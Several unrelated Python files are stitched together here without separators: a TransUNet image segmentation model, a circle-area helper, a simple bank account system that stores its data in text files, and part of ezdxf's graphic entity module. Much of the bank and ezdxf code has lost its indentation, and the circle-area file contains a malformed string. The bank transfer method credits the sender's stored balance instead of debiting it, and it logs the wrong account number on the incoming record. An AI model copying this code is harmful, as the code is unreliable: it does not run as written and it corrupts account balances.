    Returns the post-ViT feature map plus the three intermediate activations
    used as decoder skip connections.
    """

    def __init__(self, img_dim, in_channels, out_channels, head_num, mlp_dim, block_num, patch_dim):
        super().__init__()
        self.conv1 = nn.Conv2d(in_channels, out_channels, kernel_size=7, stride=2, padding=3, bias=False)
        self.norm1 = nn.BatchNorm2d(out_channels)
        self.relu = nn.ReLU(inplace=True)
        # channel count doubles (and resolution halves) at every stage
        self.encoder1 = EncoderBottleneck(out_channels, out_channels * 2, stride=2)
        self.encoder2 = EncoderBottleneck(out_channels * 2, out_channels * 4, stride=2)
        self.encoder3 = EncoderBottleneck(out_channels * 4, out_channels * 8, stride=2)
        # ViT runs on the final grid with patch_dim=1 (one token per cell)
        self.vit_img_dim = img_dim // patch_dim
        self.vit = ViT(self.vit_img_dim, out_channels * 8, out_channels * 8,
                       head_num, mlp_dim, block_num, patch_dim=1, classification=False)
        self.conv2 = nn.Conv2d(out_channels * 8, 512, kernel_size=3, stride=1, padding=1)
        self.norm2 = nn.BatchNorm2d(512)

    def forward(self, x):
        skip1 = self.relu(self.norm1(self.conv1(x)))
        skip2 = self.encoder1(skip1)
        skip3 = self.encoder2(skip2)
        feats = self.encoder3(skip3)
        feats = self.vit(feats)
        # token sequence back to a (B, C, H, W) feature map
        feats = rearrange(feats, "b (x y) c -> b c x y", x=self.vit_img_dim, y=self.vit_img_dim)
        feats = self.relu(self.norm2(self.conv2(feats)))
        return feats, skip1, skip2, skip3
class Decoder(nn.Module):
    """TransUNet decoder: four upsampling stages then a 1x1 classifier conv.

    The first three stages consume the encoder skip connections (deepest
    first); the last stage upsamples without a skip.
    """

    def __init__(self, out_channels, class_num):
        super().__init__()
        half = int(out_channels * 1 / 2)
        eighth = int(out_channels * 1 / 8)
        self.decoder1 = DecoderBottleneck(out_channels * 8, out_channels * 2)
        self.decoder2 = DecoderBottleneck(out_channels * 4, out_channels)
        self.decoder3 = DecoderBottleneck(out_channels * 2, half)
        self.decoder4 = DecoderBottleneck(half, eighth)
        # per-pixel class logits
        self.conv1 = nn.Conv2d(eighth, class_num, kernel_size=1)

    def forward(self, x, x1, x2, x3):
        out = self.decoder1(x, x3)
        out = self.decoder2(out, x2)
        out = self.decoder3(out, x1)
        out = self.decoder4(out)
        return self.conv1(out)
class TransUNet(nn.Module):
    """Full TransUNet: CNN+ViT encoder feeding a skip-connected decoder."""

    def __init__(self, img_dim, in_channels, out_channels, head_num, mlp_dim, block_num, patch_dim, class_num):
        super().__init__()
        self.encoder = Encoder(img_dim, in_channels, out_channels,
                               head_num, mlp_dim, block_num, patch_dim)
        self.decoder = Decoder(out_channels, class_num)

    def forward(self, x):
        features, skip1, skip2, skip3 = self.encoder(x)
        return self.decoder(features, skip1, skip2, skip3)
if __name__ == '__main__':
    # smoke test: print parameter count and the output shape of one forward
    # pass on a random 128x128 RGB image
    import torch

    transunet = TransUNet(img_dim=128,
                          in_channels=3,
                          out_channels=128,
                          head_num=4,
                          mlp_dim=512,
                          block_num=8,
                          patch_dim=16,
                          class_num=1)
    print(sum(p.numel() for p in transunet.parameters()))
    print(transunet(torch.randn(1, 3, 128, 128)).shape)
from math import pi
def circle_area(radius):
    """Return the area of a circle with the given radius.

    Args:
        radius: a non-negative int or float.

    Raises:
        TypeError: if radius is not an int or float (bool is rejected too,
            preserving the original `type(...) in [int, float]` behavior).
        ValueError: if radius is negative.
    """
    # isinstance instead of exact-type check; bool excluded explicitly since
    # it subclasses int but was rejected by the original implementation
    if not isinstance(radius, (int, float)) or isinstance(radius, bool):
        raise TypeError("The radius is not a number")
    if radius < 0:
        raise ValueError("The radius is less than zero.")
    return pi * (radius ** 2)
""""
radii = [2, 0, -3, 2 + 5j, True]
message = "Area of circles with r = {radius} is {area}."
for r in radii:
A = circle_area(r)
print(message.format(radius=r, area=A))
""" |
import datetime
today = datetime.date.today() # global variable to permanently store the date of day of program execution
class BankAccount(object):
"""
A class to represent a Bank Account
** This class acts as a superclass for classes; SavingsAccount and CheckAccount
Constructor Args:
-> account_number (str): A Unique Bank Account Identifier
-> funds (float): The total funds allocated to the Bank Account. Defaults to 0.0
-> transaction_history (list): A list that contains all the transactions that involves the said Bank Account. Defaults to None
"""
COUNTRY = 'IE'
CHECK_DIGIT = '69'
BANK_CODE = 'GBIK'
BRANCH_CODE = '123456'
def __init__(self, account_number: str, funds: float = 0.0, transaction_history: list = None) -> (None):
"""
constructor method for class Bank Account
Args:
-> account_number (str): A Unique Bank Account Identifier
-> funds (float): The total funds allocated to the Bank Account. Defaults to 0.0
-> transaction_history (list): A list that contains all the transactions that involves the said Bank Account. Defaults to None
"""
self.account_number = account_number
self._funds = funds
self.iban = self.COUNTRY + self.CHECK_DIGIT + self.BANK_CODE + self.BRANCH_CODE + self.account_number
if transaction_history is None:
self._transaction_history = []
else:
self._transaction_history = transaction_history
def set_funds(self, funds: float) -> (None):
"""
set method to set the protected variable funds to a new value (arg) funds
Args:
-> funds (float): update float value to set _funds to
"""
self._funds = funds
def get_funds(self) -> (float):
"""
get method to return the value of the protected variable funds
Returns:
-> float: funds is a float value
"""
return self._funds
def get_transactions(self) -> (list[list[str]]):
    """
    get method to return the protected list of transactions associated with the bank account

    Returns:
    -> list: list of transaction records; each record is a list of strings
       (index, account number, signed amount, date, kind) as built by
       deposit()/withdraw() — the previous list[str] annotation was inaccurate
    """
    return self._transaction_history
def _file_index(self, file_name: str) -> (int):
"""
method that finds the final index within a given file (file_name: str)
Args:
-> file_name (str): text file to find index for
Returns:
-> int: returns the index of the final item in the text file
"""
# try-except to catch file name error
try:
with open(file_name, 'r') as f:
num_lines = len([line.strip('\n') for line in f.readlines() if line != '\n'])
return num_lines
except IOError as file_unidentified:
print(file_unidentified)
def deposit(self, amount: float) -> (None):
    """
    method to deposit money into a given Bank Account, updates text files; accounts and transactions
    with updated values

    Args:
    -> amount (float): amount to be added to current funds; non-positive
       amounts are rejected with an error message (matching withdraw())
    """
    # check for non-negative input
    if amount > 0:
        with open('data/accounts.txt', mode='r') as f:
            new_accounts = []
            # rewrite the matching account line with the increased balance
            for account in f.readlines():
                # NOTE(review): substring match — account number '12' also
                # matches '123', and replace() hits the first occurrence of
                # the funds string anywhere on the line; fragile but preserved
                if str(self.account_number) in account:
                    account = account.replace(str(self._funds), str(self._funds + amount), 1)
                new_accounts.append(account)
        # writing all accounts back to the accounts text file
        with open('data/accounts.txt', mode='w') as f:
            for account in new_accounts:
                f.write(account)
        self._funds += amount
        # appending deposit transaction to text accountsTransactions.txt
        with open('data/accountsTransactions.txt', mode='a+') as g:
            # index of the last transaction recorded in the log file
            i = self._file_index('data/accountsTransactions.txt')
            transaction = f'{i + 1}, {self.account_number}, +{amount}, {today}, deposit\n'
            g.write(transaction)
        # append transaction to protected instance attribute transaction history
        transaction = [str(i + 1), self.account_number, '+' + str(amount), str(today), 'deposit']
        self._transaction_history.append(transaction)
    else:
        # consistency fix: withdraw() reports invalid amounts — deposit now does too
        print('\nError, Invalid Amount\n')
def withdraw(self, amount: float) -> (None):
"""
method to withdraw money from a given Bank Account, updates databases i.e updates accounts and
transactions text files with updated values
Args:
-> amount (float): amount to be subtracted from current instance funds attribute
"""
if amount > 0:
with open('data/accounts.txt', mode='r') as f:
new_accounts = []
'''
for loop to read and modify a specific account that matches the current instance's bank account number.
if a match is found, the specific account gets modified to the updated funds value within the accounts.txt file
'''
for account in f.readlines():
if self.account_number in account:
# if account number matched, modify account -> funds gets replaced with updated subtracted funds
account = account.replace(str(self._funds), str(self._funds - amount), 1)
new_accounts.append(account)
# writing all accounts back to the accounts text file
with open('data/accounts.txt', mode='w') as f:
for account in new_accounts:
f.write(account)
# update instance attribute funds
self._funds -= amount
# appending withdraw transaction to text accountsTransactions.txt
with open('data/accountsTransactions.txt', mode='a') as g:
# using the protected _file_index method to get the appropriate index of last transaction made in the text file accountsTransactions.txt
i = self._file_index('data/accountsTransactions.txt')
# define transaction string format appropriatly for writing and write transaction
transaction_txt = f'{i + 1}, {self.account_number}, -{amount}, {today}, withdrawal\n'
g.write(transaction_txt)
# append to protected instance attribute transaction history
transaction = [str(i + 1), self.account_number, '-' + str(amount), str(today), 'withdrawal']
self._transaction_history.append(transaction)
else:
print('\nError, Invalid Amount\n')
def transfer(self, amount: float, recipAccount) -> (None):
"""
method to transfer money from instance to another instance, updates text files; accounts and
accountTransactions with updated funds values
Args:
-> amount (float): amount to be transferred from current instance bank account
-> recipAccount (BankAccount): BankAccount instance that receives transfer from current instance
"""
# check for non-negative input
if amount > 0:
with open('data/accounts.txt', mode='r') as f:
new_accounts = []
'''
for loop to read and modify a specific account that matches the recipient object's bank account number.
if a match is found, the specific account gets modified to the updated funds value within the accounts.txt file
'''
for account in f.readlines():
# check if recipient bank account number matches with current account in the loop
if recipAccount.account_number in account:
# if account number matched -> funds gets replaced with added funds
account = account.replace(str(recipAccount.get_funds()), str(recipAccount.get_funds() + amount), 1)
# check if (self)instance account number m atches with current account in loop
elif self.account_number in account:
# if account number matched -> funds gets replaced with added funds
account = account.replace(str(self._funds), str(self._funds + amount), 1)
new_accounts.append(account)
# writing all accounts back to the accounts text file
with open('data/accounts.txt', mode='w') as f:
for account in new_accounts:
f.write(account)
# update current instance funds and use recipient instance's set funds class method to update(set) its protected funds attribute
self._funds -= amount
recipAccount.set_funds(recipAccount.get_funds() + amount)
# appending transfer transaction to text accountsTransactions.txt
with open('data/accountsTransactions.txt', mode='a+') as g:
# using the protected _file_index method to get the appropriate index of last transaction made in the text file
i = self._file_index('data/accountsTransactions.txt')
# define transaction string format appropriatly for writing and write transaction
transaction = f'{i + 1}, {self.account_number}, -{amount}, {today}, transfer to {recipAccount.account_number}\n{i + 2}, {recipAccount.account_number}, +{amount}, {today}, transfer from {self.account_number}\n'
g.writelines(transaction)
# append to both current Bank Account instance and Recipient Bank Account protected attribute transaction history
transaction_to = [str(i + 1), self.account_number, '-' + str(amount), str(today), f'transfer to {recipAccount.account_number}']
self._transaction_history.append(transaction_to)
transaction_from = [str(i + 2), self.account_number, '+' + str(amount), str(today), f'transfer from {self.account_number}']
recipAccount.get_transactions().append(transaction_from)
else:
print('\nError, Invalid Amount\n')
def __str__(self) -> (str):
"""
convert instance to string -> displays non-sensitive account information
"""
return f"Account Number: {self.account_number}\nIBAN: {self.iban}\n"
class SavingsAccount(BankAccount):
    """
    Subclass of class Bank Account to represent a Savings Account at a bank.
    Overridden superclass methods -> withdraw, transfer; both enforce a limit
    of one withdrawal/transfer per calendar month.
    Constructor Args:
        -> account_number (str): A Unique Bank Account Identifier
        -> funds (float): The total funds allocated to the Bank Account. Defaults to 0.0
        -> transaction_history (list): A list that contains all the transactions that involves the said Bank Account. Defaults to None
    """
    def __init__(self, account_number: str = None, funds: float = 0.0, transaction_history: list = None) -> None:
        """
        Constructor for class Savings Account
        Args:
            -> account_number (str): A Unique Bank Account Identifier
            -> funds (float): The total funds allocated to the Bank Account. Defaults to 0.0
            -> transaction_history (list): A list that contains all the transactions that involves the said Bank Account. Defaults to None
        """
        # BUGFIX: this docstring previously appeared *after* the superclass
        # call, where it is a no-op expression statement, not a docstring
        BankAccount.__init__(self, account_number, funds, transaction_history)
    def __num_withdrawal_transfers(self) -> bool:
        """
        Check whether a withdrawal or outgoing transfer was already performed
        with this account in the current month. Deposit transactions are not
        counted. Used to enforce the limit of one such transaction per month.
        Returns:
            -> bool: True if the monthly withdrawal/transfer limit is reached
        """
        for transaction in self._transaction_history:
            # transaction[3] holds the date string in ISO format 'YYYY-MM-DD'
            date_obj = datetime.datetime.strptime(transaction[3], '%Y-%m-%d')
            # BUGFIX: also compare the year -- the original matched the same
            # month of *any* year.
            # BUGFIX: outgoing transfers are stored as 'transfer to <acc>', so
            # the original equality test against 'transfer' never matched them;
            # incoming 'transfer from ...' entries deliberately do not count.
            if today.year == date_obj.year and today.month == date_obj.month and (
                    transaction[4] == 'withdrawal'
                    or transaction[4].startswith('transfer to')):
                return True
        return False
    def withdraw(self, amount: float) -> None:
        """
        Same as BankAccount.withdraw, but only allowed while funds stay
        positive and the monthly withdrawal/transfer limit is not reached.
        Args:
            -> amount (float): amount to be withdrawn from current instance account
        """
        # check sufficient funds and the monthly withdrawal/transfer count
        if (self._funds - amount) > 0 and not self.__num_withdrawal_transfers():
            return BankAccount.withdraw(self, amount)
        else:
            print('\n\nMonthly withdrawal limit reached')
    def transfer(self, amount: float, recipAccount: BankAccount) -> None:
        """
        Same as BankAccount.transfer, but only allowed while funds stay
        positive and the monthly withdrawal/transfer limit is not reached.
        Args:
            -> amount (float): amount to be transfered from current instance account
            -> recipAccount (BankAccount): recipient instance to receive funds
        """
        # check sufficient funds and the monthly withdrawal/transfer count
        if (self._funds - amount) > 0 and not self.__num_withdrawal_transfers():
            BankAccount.transfer(self, amount, recipAccount)
        else:
            print('\n\nMonthly transfer limit reached')
class CheckAccount(BankAccount):
    """
    Subclass of class Bank Account to represent a Check (current) Account with
    an overdraft facility. Overridden superclass methods -> withdraw, transfer;
    both enforce the account's credit limit.
    Constructor Args:
        -> account_number (str): A Unique Bank Account Identifier
        -> funds (float): The total funds allocated to the Bank Account. Defaults to 0.0
        -> transaction_history (list): A list that contains all the transactions that involves the said Bank Account. Defaults to None
        -> credit_limit (float): The maximum credit allowed by the account. Defaults to a credit of 50
    """
    def __init__(self, account_number: str = None, funds: float = 0.0, transaction_history: list = None, credit_limit: float = 50.0) -> None:
        """
        Constructor for class Check Account
        Args:
            -> account_number (str): A Unique Bank Account Identifier
            -> funds (float): The total funds allocated to the Bank Account. Defaults to 0.0
            -> transaction_history (list): A list that contains all the transactions that involves the said Bank Account. Defaults to None
            -> credit_limit (float): The maximum credit allowed by the account. Defaults to a credit of 50
        """
        # BUGFIX: this docstring previously appeared *after* the superclass
        # call, where it is a no-op expression statement, not a docstring
        BankAccount.__init__(self, account_number, funds, transaction_history)
        # store the limit as a non-positive number; -abs() replaces the original
        # if/else sign-flip and behaves identically for zero and negative input
        self.__credit_limit = -abs(credit_limit)
    def withdraw(self, amount: float) -> None:
        """
        Same as BankAccount.withdraw, but the resulting balance must stay
        above the (negative) credit limit.
        Args:
            -> amount (float): amount to be withdrawn from current instance account
        """
        # check that the withdrawal stays within the credit limit
        if (self._funds - amount) > self.__credit_limit:
            return BankAccount.withdraw(self, amount)
        else:
            print('\nTransaction exceeds Credit Limit\n')
    def get_credit_limit(self) -> float:
        """
        get method to return private instance credit limit
        Returns:
            -> float: max credit allowed for instance (stored as a non-positive number)
        """
        return self.__credit_limit
    def transfer(self, amount: float, recipAccount: BankAccount) -> None:
        """
        Same as BankAccount.transfer, but the resulting balance must stay
        above the (negative) credit limit.
        Args:
            -> amount (float): amount to be transfered from current instance account
            -> recipAccount (BankAccount): recipient instance to receive funds
        """
        # check that the transfer stays within the credit limit
        if (self._funds - amount) > self.__credit_limit:
            BankAccount.transfer(self, amount, recipAccount)
        else:
            print('\nTransaction Exceeds Credit Limit\n')
class Customer(object):
    """
    A class to represent a customer in a Bank Management System.
    Constructor Args:
        -> customer_id (int): A unique Customer identifier
        -> name (str): Name of customer
        -> surname (str): Surname of customer
        -> dob (datetime.datetime): stores customer date of birth as datetime object
        -> address (str): living address of customer
        -> accounts (list): list of customer bank account objects
    """
    def __init__(self, customer_id: int = 0, name: str = None, surname: str = None, dob: datetime.datetime = None, address: str = None, accounts: list[BankAccount] = None) -> None:
        """
        Customer constructor method
        Constructor Args:
            -> customer_id (int): A unique Customer identifier
            -> name (str): Name of customer
            -> surname (str): Surname of customer
            -> dob (datetime.datetime): stores customer date of birth as datetime object
            -> address (str): living address of customer
            -> accounts (list): list of customer bank account objects
        """
        self.__customer_id = customer_id
        self.name = name
        self.surname = surname
        self.__dob = dob
        self.__address = address
        # create a fresh list per instance (avoids sharing a default list)
        self.__accounts = [] if accounts is None else accounts
        # derive age from the date of birth relative to today's date
        age = today.year - self.__dob.year
        # subtract one year if this year's birthday has not occurred yet
        if today < datetime.date(today.year, self.__dob.month, self.__dob.day):
            age -= 1
        self.age = age
    def get_custID(self) -> int:
        """
        get method to return instance customer ID
        Returns:
            (int): unique customer identifier defined as integer
        """
        return self.__customer_id
    def get_accounts(self) -> list[BankAccount]:
        """
        get method to return list of instance's bank account instances
        Returns:
            (list[BankAccount]): list of bank accounts associated with instance
        """
        return self.__accounts
    def add_account(self, account: BankAccount) -> None:
        """
        Register a new account object for this customer and persist it to
        data/customers.txt and data/accounts.txt.
        Age requirements: SavingsAccount from age 14, CheckAccount from age 18.
        Args:
            account (BankAccount): BankAccount instance to be added to protected class attribute accounts
        """
        if isinstance(account, SavingsAccount) and self.age >= 14:
            self.__register_account(
                account,
                f'{account.account_number}, SavingsAccount, {account.get_funds()}\n',
            )
        # BUGFIX: the age >= 18 requirement for check accounts was documented
        # in the original comments but never enforced
        elif isinstance(account, CheckAccount) and self.age >= 18:
            self.__register_account(
                account,
                f'{account.account_number}, CheckAccount, {account.get_funds()}, {account.get_credit_limit()}\n',
            )
        else:
            # BUGFIX: the original message claimed the account was "not an
            # instance of BankAccount" even when only the age check failed
            print(f"{account} could not be added: unsupported account type or age requirement not met")
    def __register_account(self, account: BankAccount, account_line: str) -> None:
        """
        Shared persistence logic for add_account: attach the account number to
        this customer's line in customers.txt, record the account in the
        in-memory list, and append the preformatted line to accounts.txt.
        Args:
            account (BankAccount): account being registered
            account_line (str): formatted line to append to data/accounts.txt
        """
        # read all customer data and extend this customer's line
        with open('data/customers.txt', 'r') as g:
            new_customers = []
            for customer in g.readlines():
                # the first comma-separated field of each line is the customer id
                if ((customer.strip('\n')).split(', '))[0] == str(self.__customer_id):
                    customer = customer.strip('\n') + f', {account.account_number}\n'
                new_customers.append(customer)
        # write updated customers back into customers.txt
        with open('data/customers.txt', 'w') as g:
            for customer in new_customers:
                g.write(customer)
        # append new account to protected class list attribute, accounts
        self.__accounts.append(account)
        # append new account to accounts.txt in the caller-provided format
        with open('data/accounts.txt', 'a+') as f:
            f.write(account_line)
    def delete_cust_account(self, account: BankAccount) -> None:
        """
        Remove an account object from this customer's list of accounts and
        from the accounts.txt / customers.txt data files.
        Args:
            account (BankAccount): account object associated with instance to be removed from protected class attribute accounts
        """
        # rebuild accounts.txt without the deleted account's line
        with open('data/accounts.txt', mode='r') as f:
            new_accounts = []
            for acc in f.readlines():
                # skip (drop) the line belonging to the deleted account
                if account.account_number in acc:
                    continue
                new_accounts.append(acc)
        # rebuild customers.txt with the account number stripped from this customer's line
        with open('data/customers.txt', mode='r') as g:
            new_customers = []
            for cust in g.readlines():
                if account.account_number in cust:
                    pre_cust = ((cust.strip('\n')).split(', '))
                    pre_cust.remove(account.account_number)
                    cust = (', '.join(pre_cust)) + '\n'
                new_customers.append(cust)
        # removes account from protected list class attribute
        self.__accounts.remove(account)
        # write back all updated account and customer data
        with open('data/accounts.txt', mode='w') as f:
            for acc in new_accounts:
                f.write(acc)
        with open('data/customers.txt', mode='w') as g:
            for cust in new_customers:
                g.write(cust)
    def __str__(self) -> str:
        """
        convert instance to string -> displays non-sensitive customer information
        """
        return f'Name: {self.name}\nSurname: {self.surname}\nAge: {self.age}\nAddress: {self.__address}\n'
# Copyright (c) 2019-2021 Manfred Moitzi
# License: MIT License
from typing import TYPE_CHECKING, Optional, Tuple, Iterable, Dict, Any
from ezdxf.entities import factory
from ezdxf import options
from ezdxf.lldxf import validator
from ezdxf.lldxf.attributes import (
DXFAttr,
DXFAttributes,
DefSubclass,
RETURN_DEFAULT,
group_code_mapping,
)
from ezdxf import colors as clr
from ezdxf.lldxf.const import (
DXF12,
DXF2000,
DXF2004,
DXF2007,
DXF2013,
DXFValueError,
DXFKeyError,
DXFTableEntryError,
SUBCLASS_MARKER,
DXFInvalidLineType,
DXFStructureError,
)
from ezdxf.math import OCS, Matrix44
from ezdxf.proxygraphic import load_proxy_graphic, export_proxy_graphic
from .dxfentity import DXFEntity, base_class, SubclassProcessor, DXFTagStorage
if TYPE_CHECKING:
from ezdxf.eztypes import (
Auditor,
TagWriter,
BaseLayout,
DXFNamespace,
Vertex,
Drawing,
)
# Public API of this module.
__all__ = [
    "DXFGraphic",
    "acdb_entity",
    "SeqEnd",
    "add_entity",
    "replace_entity",
    "elevation_to_z_axis",
    "is_graphic_entity",
]
# DXF attribute names collected by DXFGraphic.graphic_properties().
GRAPHIC_PROPERTIES = {
    "layer",
    "linetype",
    "color",
    "lineweight",
    "ltscale",
    "true_color",
    "color_name",
    "transparency",
}
# Subclass definition of the common "AcDbEntity" attributes shared by all
# graphic entities.
acdb_entity: DefSubclass = DefSubclass(
    "AcDbEntity",
    {
        # Layer name as string, no auto fix for invalid names!
        "layer": DXFAttr(
            8, default="0", validator=validator.is_valid_layer_name
        ),
        # Linetype name as string, no auto fix for invalid names!
        "linetype": DXFAttr(
            6,
            default="BYLAYER",
            optional=True,
            validator=validator.is_valid_table_name,
        ),
        # ACI color index, BYBLOCK=0, BYLAYER=256, BYOBJECT=257:
        "color": DXFAttr(
            62,
            default=256,
            optional=True,
            validator=validator.is_valid_aci_color,
            fixer=RETURN_DEFAULT,
        ),
        # modelspace=0, paperspace=1
        "paperspace": DXFAttr(
            67,
            default=0,
            optional=True,
            validator=validator.is_integer_bool,
            fixer=RETURN_DEFAULT,
        ),
        # Lineweight in mm times 100 (e.g. 0.13mm = 13). Smallest line weight is 13
        # and biggest line weight is 200, values outside this range prevents AutoCAD
        # from loading the file.
        # Special values: BYLAYER=-1, BYBLOCK=-2, DEFAULT=-3
        "lineweight": DXFAttr(
            370,
            default=-1,
            dxfversion=DXF2000,
            optional=True,
            validator=validator.is_valid_lineweight,
            fixer=validator.fix_lineweight,
        ),
        "ltscale": DXFAttr(
            48,
            default=1.0,
            dxfversion=DXF2000,
            optional=True,
            validator=validator.is_positive,
            fixer=RETURN_DEFAULT,
        ),
        # visible=0, invisible=1
        "invisible": DXFAttr(60, default=0, dxfversion=DXF2000, optional=True),
        # True color as 0x00RRGGBB 24-bit value
        # True color always overrides ACI "color"!
        "true_color": DXFAttr(420, dxfversion=DXF2004, optional=True),
        # Color name as string. Color books are stored in .stb config files?
        "color_name": DXFAttr(430, dxfversion=DXF2004, optional=True),
        # Transparency value 0x020000TT 0 = fully transparent / 255 = opaque
        "transparency": DXFAttr(440, dxfversion=DXF2004, optional=True),
        # Shadow mode:
        # 0 = Casts and receives shadows
        # 1 = Casts shadows
        # 2 = Receives shadows
        # 3 = Ignores shadows
        "shadow_mode": DXFAttr(284, dxfversion=DXF2007, optional=True),
        "material_handle": DXFAttr(347, dxfversion=DXF2007, optional=True),
        "visualstyle_handle": DXFAttr(348, dxfversion=DXF2007, optional=True),
        # PlotStyleName type enum (AcDb::PlotStyleNameType). Stored and moved around
        # as a 16-bit integer. Custom non-entity
        "plotstyle_enum": DXFAttr(
            380, dxfversion=DXF2007, default=1, optional=True
        ),
        # Handle value of the PlotStyleName object, basically a hard pointer, but
        # has a different range to make backward compatibility easier to deal with.
        "plotstyle_handle": DXFAttr(390, dxfversion=DXF2007, optional=True),
        # 92 or 160?: Number of bytes in the proxy entity graphics represented in
        # the subsequent 310 groups, which are binary chunk records (optional)
        # 310: Proxy entity graphics data (multiple lines; 256 characters max. per
        # line) (optional), compiled by TagCompiler() to a DXFBinaryTag() objects
    },
)
# Group code -> attribute name mapping consumed by fast_load_dxfattribs().
acdb_entity_group_codes = group_code_mapping(acdb_entity)
def elevation_to_z_axis(dxf: "DXFNamespace", names: Iterable[str]):
    """Copy a legacy elevation value into the z-axis of the given vertex
    attributes and remove the elevation attribute.

    The elevation group code (38) is only used for DXF R11 and prior and is
    ignored for DXF R2000 and later: DXF R12 and later store the entity
    elevation in the z-axis of the vertices, but AutoCAD still supports
    elevation for R12 if no z-axis is present. Because ezdxf always loads
    vertices as 3D (including a z-axis even if none is present in the DXF
    file), a z-axis of 0 is treated here as "no z-axis present".
    Legacy elevation support exists for these DXF types:
    SOLID, TRACE, TEXT, CIRCLE, ARC, ATTRIB, ATTDEF, INSERT, SHAPE.
    """
    if not dxf.hasattr("elevation"):
        return
    elevation = dxf.elevation
    # ezdxf does not export the elevation attribute for any DXF version
    dxf.discard("elevation")
    if elevation == 0:
        return
    for attrib_name in names:
        vertex = dxf.get(attrib_name)
        # Only apply the elevation if the z-axis is 0. This is wrong for the
        # rare case of an explicit z-axis of 0 combined with an elevation,
        # but that combination is assumed not to occur in practice.
        if vertex is not None and vertex.z == 0:
            dxf.set(attrib_name, vertex.replace(z=elevation))
class DXFGraphic(DXFEntity):
"""Common base class for all graphic entities, a subclass of
:class:`~ezdxf.entities.dxfentity.DXFEntity`. These entities resides in
entity spaces like modelspace, paperspace or block.
"""
DXFTYPE = "DXFGFX"
DEFAULT_ATTRIBS: Dict[str, Any] = {"layer": "0"}
DXFATTRIBS = DXFAttributes(base_class, acdb_entity)
def load_dxf_attribs(
self, processor: SubclassProcessor = None
) -> "DXFNamespace":
"""Adds subclass processing for 'AcDbEntity', requires previous base
class processing by parent class.
(internal API)
"""
dxf = super().load_dxf_attribs(processor)
if processor is None:
return dxf
r12 = processor.r12
# It is valid to mix up the base class with AcDbEntity class.
processor.append_base_class_to_acdb_entity()
# Load proxy graphic data if requested
if options.load_proxy_graphics:
# length tag has group code 92 until DXF R2010
if processor.dxfversion and processor.dxfversion < DXF2013:
code = 92
else:
code = 160
self.proxy_graphic = load_proxy_graphic(
processor.subclasses[0 if r12 else 1],
length_code=code,
)
processor.fast_load_dxfattribs(dxf, acdb_entity_group_codes, 1)
return dxf
def post_new_hook(self):
"""Post processing and integrity validation after entity creation
(internal API)
"""
if self.doc:
if self.dxf.linetype not in self.doc.linetypes:
raise DXFInvalidLineType(
f'Linetype "{self.dxf.linetype}" not defined.'
)
@property
def rgb(self) -> Optional[clr.RGB]:
"""Returns RGB true color as (r, g, b) tuple or None if true_color is
not set.
"""
if self.dxf.hasattr("true_color"):
return clr.int2rgb(self.dxf.get("true_color"))
else:
return None
@rgb.setter
def rgb(self, rgb: clr.RGB) -> None:
"""Set RGB true color as (r, g , b) tuple e.g. (12, 34, 56)."""
self.dxf.set("true_color", clr.rgb2int(rgb))
@property
def transparency(self) -> float:
"""Get transparency as float value between 0 and 1, 0 is opaque and 1
is 100% transparent (invisible).
"""
if self.dxf.hasattr("transparency"):
return clr.transparency2float(self.dxf.get("transparency"))
else:
return 0.0
@transparency.setter
def transparency(self, transparency: float) -> None:
"""Set transparency as float value between 0 and 1, 0 is opaque and 1
is 100% transparent (invisible).
"""
self.dxf.set("transparency", clr.float2transparency(transparency))
def graphic_properties(self) -> Dict:
"""Returns the important common properties layer, color, linetype,
lineweight, ltscale, true_color and color_name as `dxfattribs` dict.
"""
attribs = dict()
for key in GRAPHIC_PROPERTIES:
if self.dxf.hasattr(key):
attribs[key] = self.dxf.get(key)
return attribs
def ocs(self) -> OCS:
"""Returns object coordinate system (:ref:`ocs`) for 2D entities like
:class:`Text` or :class:`Circle`, returns a pass-through OCS for
entities without OCS support.
"""
# extrusion is only defined for 2D entities like Text, Circle, ...
if self.dxf.is_supported("extrusion"):
extrusion = self.dxf.get("extrusion", default=(0, 0, 1))
return OCS(extrusion)
else:
return OCS()
def set_owner(self, owner: Optional[str], paperspace: int = 0) -> None:
"""Set owner attribute and paperspace flag. (internal API)"""
self.dxf.owner = owner
if paperspace:
self.dxf.paperspace = paperspace
else:
self.dxf.discard("paperspace")
def link_entity(self, entity: "DXFEntity") -> None:
"""Store linked or attached entities. Same API for both types of
appended data, because entities with linked entities (POLYLINE, INSERT)
have no attached entities and vice versa.
(internal API)
"""
pass
def export_entity(self, tagwriter: "TagWriter") -> None:
"""Export entity specific data as DXF tags. (internal API)"""
# Base class export is done by parent class.
self.export_acdb_entity(tagwriter)
# XDATA and embedded objects export is also done by the parent class.
def export_acdb_entity(self, tagwriter: "TagWriter"):
"""Export subclass 'AcDbEntity' as DXF tags. (internal API)"""
# Full control over tag order and YES, sometimes order matters
not_r12 = tagwriter.dxfversion > DXF12
if not_r12:
tagwriter.write_tag2(SUBCLASS_MARKER, acdb_entity.name)
self.dxf.export_dxf_attribs(
tagwriter,
[
"paperspace",
"layer",
"linetype",
"material_handle",
"color",
"lineweight",
"ltscale",
"true_color",
"color_name",
"transparency",
"plotstyle_enum",
"plotstyle_handle",
"shadow_mode",
"visualstyle_handle",
],
)
if self.proxy_graphic and not_r12 and options.store_proxy_graphics:
# length tag has group code 92 until DXF R2010
export_proxy_graphic(
self.proxy_graphic,
tagwriter=tagwriter,
length_code=(92 if tagwriter.dxfversion < DXF2013 else 160),
)
def get_layout(self) -> Optional["BaseLayout"]:
"""Returns the owner layout or returns ``None`` if entity is not
assigned to any layout.
"""
if self.dxf.owner is None or self.doc is None: # unlinked entity
return None
try:
return self.doc.layouts.get_layout_by_key(self.dxf.owner)
except DXFKeyError:
pass
try:
return self.doc.blocks.get_block_layout_by_handle(self.dxf.owner)
except DXFTableEntryError:
return None
def unlink_from_layout(self) -> None:
"""
Unlink entity from associated layout. Does nothing if entity is already
unlinked.
It is more efficient to call the
:meth:`~ezdxf.layouts.BaseLayout.unlink_entity` method of the associated
layout, especially if you have to unlink more than one entity.
"""
if not self.is_alive:
raise TypeError("Can not unlink destroyed entity.")
if self.doc is None:
# no doc -> no layout
self.dxf.owner = None
return
layout = self.get_layout()
if layout:
layout.unlink_entity(self)
def move_to_layout(
self, layout: "BaseLayout", source: "BaseLayout" = None
) -> None:
"""
Move entity from model space or a paper space layout to another layout.
For block layout as source, the block layout has to be specified. Moving
between different DXF drawings is not supported.
Args:
layout: any layout (model space, paper space, block)
source: provide source layout, faster for DXF R12, if entity is
in a block layout
Raises:
DXFStructureError: for moving between different DXF drawings
"""
if source is None:
source = self.get_layout()
if source is None:
raise DXFValueError("Source layout for entity not found.")
